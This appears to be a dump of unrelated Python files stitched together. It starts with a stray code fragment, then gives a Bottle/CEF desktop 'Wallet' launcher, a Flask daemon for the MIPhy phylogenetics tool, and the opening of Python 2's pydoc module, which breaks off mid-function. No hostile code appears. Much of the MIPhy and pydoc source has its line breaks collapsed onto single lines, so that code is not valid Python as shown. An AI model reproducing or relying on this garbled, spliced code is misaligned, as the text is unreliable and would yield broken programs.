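                                coupling_inverse=[momentum_coupling_inverse],
                                memory_mode=MemoryModes.autograd_function)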
wallet.py
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.getcwd())

import io
import threading
import socket

import bottle
from bottle import request
from bottle_sqlite import SQLitePlugin

from app.config import *
from app.routes import *

bottle.install(SQLitePlugin(dbfile=Config.databasePath))


def randomPort():
    # Bind to port 0 so the OS picks a free port, then release it for the server to use.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def serverMain(port):
    bottle.run(host="0.0.0.0", port=port)


port = randomPort()
serverThread = threading.Thread(target=serverMain, args=(port,))
serverThread.daemon = True
serverThread.start()

from cefpython3 import cefpython as cef


class LifespanHandler(object):
    def OnBeforeClose(self, browser):
        print("shutdown")


def cefMain(port):
    sys.excepthook = cef.ExceptHook  # To shutdown all CEF processes on error
    cef.Initialize()
    url = "http://localhost:%s/" % port
    browser = cef.CreateBrowserSync(url=url, window_title="Wallet")
    browser.SetClientHandler(LifespanHandler())
    cef.MessageLoop()
    cef.Shutdown()


cefMain(port)
miphy_daemon.py
import os, sys, threading from collections import deque from random import randint from flask import Flask, request, render_template, json from miphy_resources.miphy_instance import MiphyInstance from miphy_resources.miphy_common import MiphyValidationError, MiphyRuntimeError from miphy_resources.phylo import PhyloValueError ## IF STILL not working on MacOSX (actually, do this anyways), add a command line option to specify a download location. if flag is given but empty, means cwd. if flag not given, tkinter is loaded and user can specify. If location is specified, tkinter is never imported; when saving check if file exists, increment filename to avoid overwriting. If no flag is given, and tkinter fails to import (if user doesn't have it), should default to specifying location as cwd. if sys.version_info >= (3,0): # Python 3.x imports from io import StringIO try: from tkinter import Tk as tk_root from tkinter.filedialog import asksaveasfilename as saveAs except ImportError: saveAs = None else: # Python 2.x imports try: from cStringIO import StringIO except ImportError: from StringIO import StringIO try: from Tkinter import Tk as tk_root from tkFileDialog import asksaveasfilename as saveAs except ImportError: saveAs = None def daemonURL(url): return '/daemon' + url class Daemon(object): """Background daemon to serve the miphy requests. The local version should be initialized with a server port as an integer, and with web_server left as False. The user is expected to call new_instance() and process_instance(), open a web browser (if desired), and finally call start_server() which runs the flask server, and returns when no instances remain. The web_server argument should never be set to True on a local version. If it is, the user isn't expected to do anything beyond instanciation. The program expects that the flask server will be started externally (by uwsgi) or similar, and the program isn't meant to ever end. This class defines several custom HTTP status codes used to signal errors: 550 - Specific error validating the user's tree. 551 - Error loading the user's tree file. 552 - Error parsing options or data sent from web Upload form. 558 - Unknown error validating the user's tree. 559 - A request was received with an unrecognized session ID. """ def __init__(self, server_port, web_server=False, instance_timeout_inf=False, verbose=False, downloads_dir=''): max_upload_size = 10*1024*1024 # 10 MB error_log_lines = 10000 self.server_port = server_port self.web_server = web_server self.verbose = verbose self.downloads_dir = downloads_dir self.sessions = {} # Holds the miphy instances, with session IDs as keys. if not web_server: # Running locally. self.sessionID_length = 5 # Length of the unique session ID used. self.check_interval = 3 # Repeatedly wait this many seconds between running server tasks. self.maintain_wait = 2 # Interval that the page sends a signal to maintain the miphy instance. self.allowed_wait = {'after_instance':300, 'page_load':300, 'between_checks':10} # Waits before timing out miphy instances. if instance_timeout_inf: self.allowed_wait['page_load'] = float('inf') self.server_refine_limit = None self.server_max_seqs = None else: # Live, hosted web server. 
self.sessionID_length = 20 self.check_interval = 10 self.maintain_wait = 9 self.allowed_wait = {'after_instance':120, 'page_load':300, 'between_checks':30} self.server_refine_limit = 3000 # Number of sequences above which the server disables the optional refine step self.server_max_seqs = 10000 # Max number of sequences for the online version # # # Activity and error logging: self.should_quit = threading.Event() self.buff_lock = threading.Lock() self.log_buffer = StringIO() self.error_log = deque([], error_log_lines) self.error_occurred = False self.signals = [] ## TESTING. i think. self.age=0 # TESTING # # # Server setup: module_dir = os.path.dirname(os.path.abspath(__file__)) resources_dir = os.path.join(module_dir, 'resources') template_dir = os.path.join(resources_dir, 'templates') static_dir = os.path.join(resources_dir, 'static') self.server = Flask(__name__, template_folder=template_dir, static_folder=static_dir) self.server.config['MAX_CONTENT_LENGTH'] = max_upload_size # # # Server listening routes: @self.server.before_first_request def setup_tasks(): if self.web_server: # Setup tasks to start for the web version. t = threading.Thread(target=self.web_tasks) t.daemon = True; t.start() else: # Setup tasks to begin for the local version. pass # # Routes used in local version only: @self.server.route('/results') def render_results(): return render_template('results.html') @self.server.route('/') def render_index(): return render_template('index.html') @self.server.route(daemonURL('/save-svg-locally'), methods=['POST']) def save_svg(): default_filename = 'miphy_tree.svg' svgData = request.form['svgData'].encode('UTF-8') if self.downloads_dir != '': # The user specified a downloads location if not os.path.isdir(self.downloads_dir): os.makedirs(self.downloads_dir) if os.path.isfile(os.path.join(self.downloads_dir, default_filename)): # File already exists, ensure it won't be overwritten basename = default_filename[:-4] file_ind = 2 while os.path.isfile(os.path.join(self.downloads_dir, '{}_{}.svg'.format(basename, file_ind))): file_ind += 1 filename = os.path.join(self.downloads_dir, '{}_{}.svg'.format(basename, file_ind)) else: filename = os.path.join(self.downloads_dir, default_filename) else: # The user didn't specify a downloads location; ask, or if unable default to cwd if saveAs == None: filename = os.path.join(os.getcwd(), default_filename) else: try: root = tk_root() root.withdraw() filename = saveAs(initialdir=os.getcwd(), initialfile=default_filename) root.destroy() except: filename = os.path.join(os.getcwd(), default_filename) if filename: if not filename.lower().endswith('.svg'): filename += '.svg' with open(filename, 'wb') as f: f.write(svgData) print('Tree image saved to {}'.format(filename)) ret_msg = 'Svg file saved to %s' % (filename) else: ret_msg = 'File not saved.' 
return ret_msg @self.server.route(daemonURL('/save-csv-locally'), methods=['POST']) def save_csv(): default_filename = 'miphy_data.csv' if self.downloads_dir != '': # The user specified a downloads location if not os.path.isdir(self.downloads_dir): os.makedirs(self.downloads_dir) if os.path.isfile(os.path.join(self.downloads_dir, default_filename)): # File already exists, ensure it won't be overwritten basename = default_filename[:-4] file_ind = 2 while os.path.isfile(os.path.join(self.downloads_dir, '{}_{}.csv'.format(basename, file_ind))): file_ind += 1 filename = os.path.join(self.downloads_dir, '{}_{}.csv'.format(basename, file_ind)) else: filename = os.path.join(self.downloads_dir, default_filename) else: # The user didn't specify a downloads location; ask, or if unable default to cwd if saveAs == None: filename = os.path.join(os.getcwd(), default_filename) else: try: root = tk_root() root.withdraw() filename = saveAs(initialdir=os.getcwd(), initialfile=default_filename) root.destroy() except: filename = os.path.join(os.getcwd(), default_filename) if filename: csvStr = request.form['csvStr'].encode('UTF-8') if not filename.lower().endswith('.csv'): filename += '.csv' with open(filename, 'wb') as f: f.write(csvStr) print('Score data saved to {}'.format(filename)) return 'Csv file saved to %s' % (filename) else: return 'Csv file not saved, as no filename was chosen.' # # Routes used in web version only: @self.server.route(daemonURL('/upload-files'), methods=['POST']) def upload_files(): try: gene_tree_data = request.files['tree-file'].read() info_data = request.files['info-file'].read() use_coords = request.form['usecoords'] merge = True if request.form['merge'] == 'true' else False gene_tree_format = request.form['treeformat'] except Exception as err: return (str(err), 552) if use_coords == 'true': use_coords = True elif use_coords == 'false': use_coords = False else: return ('error parsing usecoords value: "%s"' % use_coords, 552) try: idnum = self.new_instance(gene_tree_data, info_data, gene_tree_format, merge_singletons=merge, use_coords=use_coords) except MiphyValidationError as err: return (str(err), 550) except PhyloValueError as err: return (str(err), 551) except Exception as err: return (str(err), 558) numseqs = self.sessions[idnum].num_sequences spc = self.sessions[idnum].species action_msg, action_info = '', '' if self.server_max_seqs and numseqs > self.server_max_seqs: action_msg = 'over seq limit' action_info = self.server_max_seqs elif use_coords==True and self.server_refine_limit and numseqs > self.server_refine_limit: action_msg = 'over refine limit' action_info = self.server_refine_limit return json.dumps({'idnum':idnum, 'actionmsg':action_msg, 'actioninfo':action_info, 'numseqs':numseqs, 'numspc':len(spc)}) @self.server.route(daemonURL('/process-data'), methods=['POST']) def process_data(): mi, idnum, msg = self.get_instance() if mi == None: return msg merge = True if request.form['merge'] == 'true' else False params = (float(request.form['ILS']), float(request.form['dups']), float(request.form['loss']), float(request.form['spread']), merge) mi.processed(params) numseqs = mi.num_sequences return json.dumps({'numseqs':numseqs, 'numspc':len(mi.species), 'numclstrs':len(mi.clusters[params])}) @self.server.route(daemonURL('/get-sessions'), methods=['GET']) def get_sessions(): return json.dumps({'numsessions':len(self.sessions), 'keys':list(self.sessions.keys()), 'age':self.age}) # # Routes used in local and web versions: @self.server.route(daemonURL('/get-data'), 
methods=['POST']) def send_data(): mi, idnum, msg = self.get_instance() if mi == None: return msg info = {'maintainwait':self.maintain_wait*1000, 'speciestree':mi.species_tree_data, 'specieslist':mi.species, 'treedata':mi.tree_data, 'speciescolours':mi.species_colours, 'initweights':mi.init_weights, 'sequencenames':mi.sequence_names, 'seqspecies':mi.species_mapping, 'webversion':self.web_server, 'merge':mi.merge_singletons, 'usecoords':mi.use_coords} return json.dumps(info) @self.server.route(daemonURL('/cluster-tree'), methods=['POST']) def cluster_tree(): mi, idnum, msg = self.get_instance() if mi == None: return msg merge = True if request.form['merge'] == 'true' else False params = (float(request.form['ILS']), float(request.form['dups']), float(request.form['loss']), float(request.form['spread']), merge) mi.cluster(params) return json.dumps(mi.cluster_list[params]) @self.server.route(daemonURL('/page-loaded'), methods=['POST']) def page_loaded(): mi, idnum, msg = self.get_instance() if mi == None: return msg mi.page_loaded() return 'page-loaded successful.' @self.server.route(daemonURL('/maintain-server'), methods=['POST']) def maintain_server(): mi, idnum, msg = self.get_instance() if mi == None: return msg mi.maintain() return 'maintain-server successful.' @self.server.route(daemonURL('/instance-closed'), methods=['POST']) def instance_closed(): mi, idnum, msg = self.get_instance() if mi == None: return msg del self.sessions[idnum] if not self.web_server and len(self.sessions) == 0: self.should_quit.set() return 'instance-closed successful.' @self.server.route('/docs') def render_docs(): return render_template('/docs.html') @self.server.route('/contact') def render_contact(): return render_template('/contact.html') # # # TESTING CODE @self.server.route('/monitor') def render_monitor(): return render_template('/monitor.html') # # # END OF TESTING. def new_instance(self, gene_tree_data, info_data, gene_tree_format, merge_singletons=False, use_coords=True, coords_file=''): if type(info_data) == bytes: info_data = info_data.decode() if type(gene_tree_data) == bytes: gene_tree_data = gene_tree_data.decode() idnum = self.generateSessionID() self.sessions[idnum] = MiphyInstance(gene_tree_data, info_data, gene_tree_format, self.allowed_wait, merge_singletons, use_coords, coords_file, self.verbose, refine_limit=self.server_refine_limit) return idnum def process_instance(self, idnum, params): self.sessions[idnum].processed(params) def start_server(self): if self.web_server: return False # Only used for local version. olderr = sys.stderr sys.stderr = self.log_buffer t = threading.Thread(target=self.server.run, kwargs={'threaded':True, 'port':self.server_port}) t.daemon = True; t.start() try: while not self.should_quit.is_set(): self.should_quit.wait(self.check_interval) self.parse_err_logs() self.collect_garbage() self.parse_err_logs() if self.error_occurred: print("\nAt least one server call responded with an error. Session log:") print(''.join(self.error_log)) except Exception as error: self.parse_err_logs() print("\nPython encountered an error. Start of session log:") print(''.join(self.error_log)) print("\nEnd of session log. The error:\n"+str(error)) # raise finally: sys.stderr = olderr def web_tasks(self): if not self.web_server: return False # Only used for web version. 
        while not self.should_quit.is_set():
            self.should_quit.wait(self.check_interval)
            self.collect_garbage()

    def close(self):
        """Careful with this; the web version should probably never have this method actually used."""
        self.should_quit.set()

    # # #  Private methods:
    def get_instance(self, should_fail=False):
        """HTTP status code 559 is used here to indicate a response was requested for a session ID that
        does not exist."""
        if should_fail:
            return None, 0, ('DEBUG ONLY: Intentional fail.', 588)
        idnum = request.form['session_id']
        if idnum in self.sessions:
            return self.sessions[idnum], idnum, 'session ID is valid.'
        else:
            return None, idnum, ("error, invalid session ID %s." % idnum, 559)

    def generateSessionID(self):
        # Javascript has issues parsing a number if the string begins with a non-significant zero.
        idnum = ''.join([str(randint(0,9)) for i in range(self.sessionID_length)])
        while idnum in self.sessions or idnum[0] == '0':
            idnum = ''.join([str(randint(0,9)) for i in range(self.sessionID_length)])
        return idnum

    def collect_garbage(self):
        self.age += 1 # TESTING
        to_remove = []
        for idnum, mi in self.sessions.items():
            alive = mi.still_alive()
            if not alive:
                to_remove.append(idnum)
        for idnum in to_remove:
            del self.sessions[idnum]
        if not self.web_server: # if personal server with no live instances.
            if len(self.sessions) == 0:
                print('last MIPhy instance closed, shutting down server.')
                self.should_quit.set()

    def parse_err_logs(self):
        with self.buff_lock:
            log_data = self.log_buffer.getvalue()
            self.log_buffer.seek(0)
            self.log_buffer.truncate(0)
            for line in log_data.splitlines(True):
                if '/maintain-server HTTP/1.1" 200' not in line:
                    retcode = line.rpartition('-')[0].strip().rpartition('"')[2].strip()
                    if retcode not in ('200','304') and '* Running on http://' not in line:
                        self.error_occurred = True
                        print('\nError encountered:\n%s' % line.strip())
                    self.error_log.append(line)

    def shutdown(self):
        # tk_root is only instantiated on demand by the file-save dialogs, so guard against it being absent.
        if getattr(self, 'tk_root', None):
            self.tk_root.destroy()
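

# A minimal local-usage sketch following the workflow described in the Daemon docstring
# (not executed on import).  The tree format string, weights and port below are
# hypothetical placeholders; the parameter tuple mirrors the one parsed by the
# '/process-data' route: (ILS, duplication, loss, spread, merge_singletons).
def _run_local_daemon_example(gene_tree_data, info_data, port=8000):
    daemon = Daemon(port, web_server=False, verbose=True)
    idnum = daemon.new_instance(gene_tree_data, info_data, 'newick')
    daemon.process_instance(idnum, (0.5, 1.0, 1.0, 0.5, False))
    # Open http://127.0.0.1:<port>/results in a browser, then block until the last
    # browser instance closes:
    daemon.start_server()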
pydoc.py
#!/usr/bin/env python # -*- coding: latin-1 -*- """Generate Python documentation in HTML or text for interactive use. In the Python interpreter, do "from pydoc import help" to provide online help. Calling help(thing) on a Python object documents the object. Or, at the shell command line outside of Python: Run "pydoc <name>" to show documentation on something. <name> may be the name of a function, module, package, or a dotted reference to a class or function within a module or module in a package. If the argument contains a path segment delimiter (e.g. slash on Unix, backslash on Windows) it is treated as the path to a Python source file. Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines of all available modules. Run "pydoc -p <port>" to start an HTTP server on a given port on the local machine to generate documentation web pages. Port number 0 can be used to get an arbitrary unused port. For platforms without a command line, "pydoc -g" starts the HTTP server and also pops up a little window for controlling it. Run "pydoc -w <name>" to write out the HTML documentation for a module to a file named "<name>.html". Module docs for core modules are assumed to be in https://docs.python.org/library/ This can be overridden by setting the PYTHONDOCS environment variable to a different URL or to a local directory containing the Library Reference Manual pages. """ __author__ = "Ka-Ping Yee <ping@lfw.org>" __date__ = "26 February 2001" __version__ = "$Revision: 88564 $" __credits__ = """Guido van Rossum, for an excellent programming language. Tommy Burnette, the original creator of manpy. Paul Prescod, for all his work on onlinehelp. Richard Chamberlain, for the first implementation of textdoc. """ # Known bugs that can't be fixed here: # - imp.load_module() cannot be prevented from clobbering existing # loaded modules, so calling synopsis() on a binary module file # changes the contents of any existing module with the same name. # - If the __file__ attribute on a module is a relative path and # the current directory is changed with os.chdir(), an incorrect # path will be displayed. import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings from repr import Repr from string import expandtabs, find, join, lower, split, strip, rfind, rstrip from traceback import extract_tb try: from collections import deque except ImportError: # Python 2.3 compatibility class deque(list): def popleft(self): return self.pop(0) # --------------------------------------------------------- common routines def pathdirs(): """Convert sys.path into a list of absolute, existing, unique paths.""" dirs = [] normdirs = [] for dir in sys.path: dir = os.path.abspath(dir or '.') normdir = os.path.normcase(dir) if normdir not in normdirs and os.path.isdir(dir): dirs.append(dir) normdirs.append(normdir) return dirs def getdoc(object): """Get the doc string or comments for an object.""" result = inspect.getdoc(object) or inspect.getcomments(object) result = _encode(result) return result and re.sub('^ *\n', '', rstrip(result)) or '' def splitdoc(doc): """Split a doc string into a synopsis line (if any) and the rest.""" lines = split(strip(doc), '\n') if len(lines) == 1: return lines[0], '' elif len(lines) >= 2 and not rstrip(lines[1]): return lines[0], join(lines[2:], '\n') return '', join(lines, '\n') def classname(object, modname): """Get a class name and qualify it with a module name if necessary.""" name = object.__name__ if object.__module__ != modname: name = object.__module__ + '.' 
+ name return name def isdata(object): """Check if an object is of a type that probably means it's data.""" return not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isframe(object) or inspect.istraceback(object) or inspect.iscode(object)) def replace(text, *pairs): """Do a series of global replacements on a string.""" while pairs: text = join(split(text, pairs[0]), pairs[1]) pairs = pairs[2:] return text def cram(text, maxlen): """Omit part of a string if needed to make it fit in a maximum length.""" if len(text) > maxlen: pre = max(0, (maxlen-3)//2) post = max(0, maxlen-3-pre) return text[:pre] + '...' + text[len(text)-post:] return text _re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE) def stripid(text): """Remove the hexadecimal id from a Python object representation.""" # The behaviour of %p is implementation-dependent in terms of case. return _re_stripid.sub(r'\1', text) def _is_some_method(obj): return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj) def allmethods(cl): methods = {} for key, value in inspect.getmembers(cl, _is_some_method): methods[key] = 1 for base in cl.__bases__: methods.update(allmethods(base)) # all your base are belong to us for key in methods.keys(): methods[key] = getattr(cl, key) return methods def _split_list(s, predicate): """Split sequence s via predicate, and return pair ([true], [false]). The return value is a 2-tuple of lists, ([x for x in s if predicate(x)], [x for x in s if not predicate(x)]) """ yes = [] no = [] for x in s: if predicate(x): yes.append(x) else: no.append(x) return yes, no def visiblename(name, all=None, obj=None): """Decide whether to show documentation on a variable.""" # Certain special names are redundant. _hidden_names = ('__builtins__', '__doc__', '__file__', '__path__', '__module__', '__name__', '__slots__', '__package__') if name in _hidden_names: return 0 # Private names are hidden, but special names are displayed. if name.startswith('__') and name.endswith('__'): return 1 # Namedtuples have public fields and methods with a single leading underscore if name.startswith('_') and hasattr(obj, '_fields'): return 1 if all is not None: # only document that which the programmer exported in __all__ return name in all else: return not name.startswith('_') def classify_class_attrs(object): """Wrap inspect.classify_class_attrs, with fixup for data descriptors.""" def fixup(data): name, kind, cls, value = data if inspect.isdatadescriptor(value): kind = 'data descriptor' return name, kind, cls, value return map(fixup, inspect.classify_class_attrs(object)) # ----------------------------------------------------- Unicode support helpers try: _unicode = unicode except NameError: # If Python is built without Unicode support, the unicode type # will not exist. Fake one that nothing will match, and make # the _encode function that do nothing. class _unicode(object): pass _encoding = 'ascii' def _encode(text, encoding='ascii'): return text else: import locale _encoding = locale.getpreferredencoding() def _encode(text, encoding=None): if isinstance(text, unicode): return text.encode(encoding or _encoding, 'xmlcharrefreplace') else: return text def _binstr(obj): # Ensure that we have an encoded (binary) string representation of obj, # even if it is a unicode string. 
if isinstance(obj, _unicode): return obj.encode(_encoding, 'xmlcharrefreplace') return str(obj) # ----------------------------------------------------- module manipulation def ispackage(path): """Guess whether a path refers to a package directory.""" if os.path.isdir(path): for ext in ('.py', '.pyc', '.pyo'): if os.path.isfile(os.path.join(path, '__init__' + ext)): return True return False def source_synopsis(file): line = file.readline() while line[:1] == '#' or not strip(line): line = file.readline() if not line: break line = strip(line) if line[:4] == 'r"""': line = line[1:] if line[:3] == '"""': line = line[3:] if line[-1:] == '\\': line = line[:-1] while not strip(line): line = file.readline() if not line: break result = strip(split(line, '"""')[0]) else: result = None return result def synopsis(filename, cache={}): """Get the one-line summary out of a module file.""" mtime = os.stat(filename).st_mtime lastupdate, result = cache.get(filename, (None, None)) if lastupdate is None or lastupdate < mtime: info = inspect.getmoduleinfo(filename) try: file = open(filename) except IOError: # module can't be opened, so skip it return None if info and 'b' in info[2]: # binary modules have to be imported try: module = imp.load_module('__temp__', file, filename, info[1:]) except: return None result = module.__doc__.splitlines()[0] if module.__doc__ else None del sys.modules['__temp__'] else: # text modules can be directly examined result = source_synopsis(file) file.close() cache[filename] = (mtime, result) return result class ErrorDuringImport(Exception): """Errors that occurred while trying to import something to document it.""" def __init__(self, filename, exc_info): exc, value, tb = exc_info self.filename = filename self.exc = exc self.value = value self.tb = tb def __str__(self): exc = self.exc if type(exc) is types.ClassType: exc = exc.__name__ return 'problem in %s - %s: %s' % (self.filename, exc, self.value) def importfile(path): """Import a Python source file or compiled file given its path.""" magic = imp.get_magic() file = open(path, 'r') if file.read(len(magic)) == magic: kind = imp.PY_COMPILED else: kind = imp.PY_SOURCE file.close() filename = os.path.basename(path) name, ext = os.path.splitext(filename) file = open(path, 'r') try: module = imp.load_module(name, file, path, (ext, 'r', kind)) except: raise ErrorDuringImport(path, sys.exc_info()) file.close() return module def safeimport(path, forceload=0, cache={}): """Import a module; handle errors; return None if the module isn't found. If the module *is* found but an exception occurs, it's wrapped in an ErrorDuringImport exception and reraised. Unlike __import__, if a package path is specified, the module at the end of the path is returned, not the package at the beginning. If the optional 'forceload' argument is 1, we reload the module from disk (unless it's a dynamic extension).""" try: # If forceload is 1 and the module has been previously loaded from # disk, we always have to reload the module. Checking the file's # mtime isn't good enough (e.g. the module could contain a class # that inherits from another module that has changed). if forceload and path in sys.modules: if path not in sys.builtin_module_names: # Avoid simply calling reload() because it leaves names in # the currently loaded module lying around if they're not # defined in the new source file. Instead, remove the # module from sys.modules and re-import. 
Also remove any # submodules because they won't appear in the newly loaded # module's namespace if they're already in sys.modules. subs = [m for m in sys.modules if m.startswith(path + '.')] for key in [path] + subs: # Prevent garbage collection. cache[key] = sys.modules[key] del sys.modules[key] module = __import__(path) except: # Did the error occur before or after the module was found? (exc, value, tb) = info = sys.exc_info() if path in sys.modules: # An error occurred while executing the imported module. raise ErrorDuringImport(sys.modules[path].__file__, info) elif exc is SyntaxError: # A SyntaxError occurred before we could execute the module. raise ErrorDuringImport(value.filename, info) elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport': # The import error occurred directly in this function, # which means there is no such module in the path. return None else: # Some other error occurred during the importing process. raise ErrorDuringImport(path, sys.exc_info()) for part in split(path, '.')[1:]: try: module = getattr(module, part) except AttributeError: return None return module # ---------------------------------------------------- formatter base class class Doc: def document(self, object, name=None, *args): """Generate documentation for an object.""" args = (object, name) + args # 'try' clause is to attempt to handle the possibility that inspect # identifies something in a way that pydoc itself has issues handling; # think 'super' and how it is a descriptor (which raises the exception # by lacking a __name__ attribute) and an instance. if inspect.isgetsetdescriptor(object): return self.docdata(*args) if inspect.ismemberdescriptor(object): return self.docdata(*args) try: if inspect.ismodule(object): return self.docmodule(*args) if inspect.isclass(object): return self.docclass(*args) if inspect.isroutine(object): return self.docroutine(*args) except AttributeError: pass if isinstance(object, property): return self.docproperty(*args) return self.docother(*args) def fail(self, object, name=None, *args): """Raise an exception for unimplemented types.""" message = "don't know how to document object%s of type %s" % ( name and ' ' + repr(name), type(object).__name__) raise TypeError, message docmodule = docclass = docroutine = docother = docproperty = docdata = fail def getdocloc(self, object, basedir=os.path.join(sys.exec_prefix, "lib", "python"+sys.version[0:3])): """Return the location of module docs or None""" try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' docloc = os.environ.get("PYTHONDOCS", "https://docs.python.org/library") basedir = os.path.normcase(basedir) if (isinstance(object, type(os)) and (object.__name__ in ('errno', 'exceptions', 'gc', 'imp', 'marshal', 'posix', 'signal', 'sys', 'thread', 'zipimport') or (file.startswith(basedir) and not file.startswith(os.path.join(basedir, 'site-packages')))) and object.__name__ not in ('xml.etree', 'test.pydoc_mod')): if docloc.startswith(("http://", "https://")): docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__.lower()) else: docloc = os.path.join(docloc, object.__name__.lower() + ".html") else: docloc = None return docloc # -------------------------------------------- HTML documentation generator class HTMLRepr(Repr): """Class for safely making an HTML representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def escape(self, text): return replace(text, '&', '&amp;', '<', 
'&lt;', '>', '&gt;') def repr(self, object): return Repr.repr(self, object) def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if hasattr(self, methodname): return getattr(self, methodname)(x, level) return self.escape(cram(stripid(repr(x)), self.maxother)) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + self.escape(test) + testrepr[0] return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)', r'<font color="#c040c0">\1</font>', self.escape(testrepr)) repr_str = repr_string def repr_instance(self, x, level): try: return self.escape(cram(stripid(repr(x)), self.maxstring)) except: return self.escape('<%s instance>' % x.__class__.__name__) repr_unicode = repr_string class HTMLDoc(Doc): """Formatter class for HTML documentation.""" # ------------------------------------------- HTML formatting utilities _repr_instance = HTMLRepr() repr = _repr_instance.repr escape = _repr_instance.escape def page(self, title, contents): """Format an HTML page.""" return _encode(''' <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Python: %s</title> <meta charset="utf-8"> </head><body bgcolor="#f0f0f8"> %s </body></html>''' % (title, contents), 'ascii') def heading(self, title, fgcol, bgcol, extras=''): """Format a page heading.""" return ''' <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading"> <tr bgcolor="%s"> <td valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td ><td align=right valign=bottom ><font color="%s" face="helvetica, arial">%s</font></td></tr></table> ''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;') def section(self, title, fgcol, bgcol, contents, width=6, prelude='', marginalia=None, gap='&nbsp;'): """Format a section with a heading.""" if marginalia is None: marginalia = '<tt>' + '&nbsp;' * width + '</tt>' result = '''<p> <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section"> <tr bgcolor="%s"> <td colspan=3 valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">%s</font></td></tr> ''' % (bgcol, fgcol, title) if prelude: result = result + ''' <tr bgcolor="%s"><td rowspan=2>%s</td> <td colspan=2>%s</td></tr> <tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap) else: result = result + ''' <tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap) return result + '\n<td width="100%%">%s</td></tr></table>' % contents def bigsection(self, title, *args): """Format a section with a big heading.""" title = '<big><strong>%s</strong></big>' % title return self.section(title, *args) def preformat(self, text): """Format literal preformatted text.""" text = self.escape(expandtabs(text)) return replace(text, '\n\n', '\n \n', '\n\n', '\n \n', ' ', '&nbsp;', '\n', '<br>\n') def multicolumn(self, list, format, cols=4): """Format a list of items into a multi-column list.""" result = '' rows = (len(list)+cols-1)//cols for col in range(cols): result = result + '<td width="%d%%" valign=top>' % (100//cols) for i in range(rows*col, rows*col+rows): if i < len(list): result = result + format(list[i]) + '<br>\n' result = result + '</td>' return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result def grey(self, text): return '<font 
color="#909090">%s</font>' % text def namelink(self, name, *dicts): """Make a link for an identifier, given name-to-URL mappings.""" for dict in dicts: if name in dict: return '<a href="%s">%s</a>' % (dict[name], name) return name def classlink(self, object, modname): """Make a link for a class.""" name, module = object.__name__, sys.modules.get(object.__module__) if hasattr(module, name) and getattr(module, name) is object: return '<a href="%s.html#%s">%s</a>' % ( module.__name__, name, classname(object, modname)) return classname(object, modname) def modulelink(self, object): """Make a link for a module.""" return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__) def modpkglink(self, data): """Make a link for a module or package to display in an index.""" name, path, ispackage, shadowed = data if shadowed: return self.grey(name) if path: url = '%s.%s.html' % (path, name) else: url = '%s.html' % name if ispackage: text = '<strong>%s</strong>&nbsp;(package)' % name else: text = name return '<a href="%s">%s</a>' % (url, text) def markup(self, text, escape=None, funcs={}, classes={}, methods={}): """Mark up some plain text, given a context of symbols to look for. Each context dictionary maps object names to anchor names.""" escape = escape or self.escape results = [] here = 0 pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|' r'RFC[- ]?(\d+)|' r'PEP[- ]?(\d+)|' r'(self\.)?(\w+))') while True: match = pattern.search(text, here) if not match: break start, end = match.span() results.append(escape(text[here:start])) all, scheme, rfc, pep, selfdot, name = match.groups() if scheme: url = escape(all).replace('"', '&quot;') results.append('<a href="%s">%s</a>' % (url, url)) elif rfc: url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif pep: url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif selfdot: # Create a link for methods like 'self.method(...)' # and use <strong> for attributes like 'self.attr' if text[end:end+1] == '(': results.append('self.' 
+ self.namelink(name, methods)) else: results.append('self.<strong>%s</strong>' % name) elif text[end:end+1] == '(': results.append(self.namelink(name, methods, funcs, classes)) else: results.append(self.namelink(name, classes)) here = end results.append(escape(text[here:])) return join(results, '') # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None): """Produce HTML for a class tree as given by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + '<dt><font face="helvetica, arial">' result = result + self.classlink(c, modname) if bases and bases != (parent,): parents = [] for base in bases: parents.append(self.classlink(base, modname)) result = result + '(' + join(parents, ', ') + ')' result = result + '\n</font></dt>' elif type(entry) is type([]): result = result + '<dd>\n%s</dd>\n' % self.formattree( entry, modname, c) return '<dl>\n%s</dl>\n' % result def docmodule(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a module object.""" name = object.__name__ # ignore the passed-in name try: all = object.__all__ except AttributeError: all = None parts = split(name, '.') links = [] for i in range(len(parts)-1): links.append( '<a href="%s.html"><font color="#ffffff">%s</font></a>' % (join(parts[:i+1], '.'), parts[i])) linkedname = join(links + parts[-1:], '.') head = '<big><big><strong>%s</strong></big></big>' % linkedname try: path = inspect.getabsfile(object) 